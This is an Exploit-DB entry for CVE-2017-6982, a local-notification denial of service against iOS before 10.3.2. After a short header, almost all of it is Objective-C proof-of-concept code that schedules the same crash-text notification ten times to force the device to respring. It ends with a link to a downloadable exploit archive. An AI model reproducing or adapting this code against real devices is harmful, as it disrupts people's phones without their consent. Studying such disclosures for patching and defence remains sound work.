exploit-db-mirror/exploits/ios/dos/42014.txt

# Exploit Title: Apple iOS < 10.3.2 - Notifications API Denial of Service
# Date: 05-15-2017
# Exploit Author: Sem Voigtländer (@OxFEEDFACE), Vincent Desmurs (@vincedes3) and Joseph Shenton
# Vendor Homepage: https://apple.com
# Software Link: https://support.apple.com/en-us/HT207798
# Version: iOS 10.3.2
# Tested on: iOS 10.3.2 iPhone 6
# CVE : CVE-2017-6982

# We do not disclose a PoC for remote notifications.
# PoC for local notifications. (Objective-C).


defaults = [NSUserDefaults standardUserDefaults];
UIUserNotificationType types = UIUserNotificationTypeBadge | UIUserNotificationTypeSound | UIUserNotificationTypeAlert;
UIUserNotificationSettings *mySettings = [UIUserNotificationSettings settingsForTypes:types categories:nil];
[[UIApplication sharedApplication] registerUserNotificationSettings:mySettings];

//1
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];

NSTimeInterval interval;
interval = 5; //Time here in second to respring
UILocalNotification* localNotification = [[UILocalNotification alloc] init];
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];

//2
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];

//3
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];

//4
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];

//5
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];

//6
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];

//7
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];

//8
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];

//9
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];

//10
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42014.zip